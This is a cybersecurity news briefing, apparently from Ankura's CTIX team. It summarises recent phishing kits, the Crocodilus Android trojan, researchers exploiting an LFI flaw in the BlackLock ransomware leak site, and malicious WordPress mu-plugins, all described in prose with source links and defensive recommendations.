Malware Activity
The Growing Threat of Evolving Malware and Phishing Tactics
The digital landscape is seeing an alarming rise of sophisticated phishing and malware tactics. Most recently, advanced phishing kits dubbed "Morphing Meerkat," which cleverly exploit vulnerabilities in DNS MX records. These kits not only shift their appearance dynamically to dodge detection, which greatly complicates cybersecurity efforts, but they also reflect broader trends in phishing-as-a-service (PhaaS) operations utilizing DNS over HTTPS (DoH) to obfuscate their activities and undermine traditional security measures. Simultaneously, a more targeted threat emerges in the form of Crocodilus, a malware strain that primarily preys on Android users by masquerading as legitimate applications to extract sensitive cryptocurrency wallet keys and manipulate device functionalities through over 200 apps, particularly from third-party sources. This Trojan can usurp control of devices, intercept SMS messages, and even execute overlays on authentic banking applications, deceiving users into divulging their financial credentials. Correspondingly, a resurgence of malware exploiting critical vulnerabilities, such as those found in Ivanti's Endpoint Manager, raises alarms as hackers deploy malicious payloads to compromised systems, subsequently fueling a rise in ransomware attacks. Compounding these threats is the growing tendency among cybercriminals to utilize obscure programming languages for malware development, a tactic that makes detection and analysis increasingly difficult for cybersecurity professionals as it allows fraudsters to hide their malicious intents more effectively amid a landscape filled with outdated or unpatched software. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- SecurityAffairs: Morphing Meerkat Phishing Kits article
- BleepingComputer: Phishing-as-a-Service Operation Uses DNS over HTTPS article
- BleepingComputer: New Crocodilus Malware Steals Android Users Crypto Wallet Keys article
- TheHackerNews: New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials article
- SecurityWeek: Crocodilus Android Banking Trojan article
- TheHackerNews: RESURGE Malware Exploits Ivanti Flaw article
- TheRegister: Malware Using Obscure Languages article
Threat Actor Activity
Researchers Exploit Vulnerability in BlackLock Ransomware Leak Site
In an instance of "hacking the hackers," threat hunters have infiltrated the infrastructure of the BlackLock ransomware group, uncovering significant insights into their operations. Researchers identified a security vulnerability in BlackLock's data leak site (DLS), enabling the extraction of configuration files, credentials, and command histories. The flaw involved a misconfiguration that exposed clearnet IP addresses related to the groupโs network behind TOR hidden services, marking a substantial operational security failure. BlackLock, a rebranded version of the Eldorado ransomware group, has become one of the most active extortion syndicates in 2025, targeting sectors such as technology, manufacturing, finance, and retail. As of last month, forty-six (46) victims from diverse countries including Argentina, Brazil, the United States, and others were listed on its site. The group also launched an underground affiliate network in January 2025, recruiting โtraffersโ to direct victims to malware-deploying pages for initial system access. The vulnerability identified by researchers is a local file inclusion (LFI) bug, which allowed a path traversal attack leading to sensitive information leakage. Notable findings include the use of Rclone to exfiltrate data to the MEGA cloud storage service, and the creation of multiple MEGA accounts using disposable email addresses for storing victim data. Reverse engineering revealed similarities between BlackLock and another ransomware strain, DragonForce, although they differ in code language (BlackLock uses Go while DragonForce uses Visual C++). Intriguingly, BlackLock's DLS was defaced by DragonForce on March 20, likely exploiting the same LFI vulnerability, with configuration files and internal chats leaked. This followed the defacement of Mamona ransomware's DLS a day prior. Researchers speculate that BlackLock may have cooperated with DragonForce or transitioned ownership due to market consolidation, potentially compromising previous operations.
Vulnerabilities
WordPress MU-Plugin Directory Exploited to Inject Malicious Code
Hackers are increasingly exploiting the WordPress "mu-plugins" (Must-Use Plugins) directory to conceal and execute malicious code, allowing for persistent remote access and undetected attacks across all site pages. These plugins, which automatically run without being activated through the administrative dashboard and are hidden from the standard plugin interface, make an ideal target for threat actors. Security researchers have identified three (3) main malicious payloads being deployed in this directory. The first, redirects users (excluding bots and admins) to a fake browser update page to install malware. Another acting as a webshell that remotely executes PHP code from GitHub, and a third that injects JavaScript to replace site images with explicit content and hijack outbound links for spam and scams. These attacks degrade site reputation, damage SEO rankings, and can lead to data theft or further exploitation. Additionally, compromised WordPress sites are being used to deploy malicious JavaScript, redirecting users or stealing financial data through checkout page skimmers. The precise method of infection remains uncertain but likely involves vulnerable plugins or themes, weak admin credentials, and server misconfigurations. Researchers have also noted the exploitation of several high-severity WordPress plugin vulnerabilities in 2024, emphasizing the urgent need for regular updates, code audits, strong passwords, multi-factor authentication, and deployment of web application firewalls to mitigate these evolving threats. CTIX analysts recommend that site administrators make a habit of staying up to date with the latest WordPress plugin exploits, and always be on the lookout for security patches as they are released.
- The Hacker News: WordPress MU-Plugin Exploitation Article
- Bleeping Computer: WordPress MU-Plugin Exploitation Article
๐ง Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura's Cyber Flash Update, a bi-weekly briefing curated by our top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.
ยฉ Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
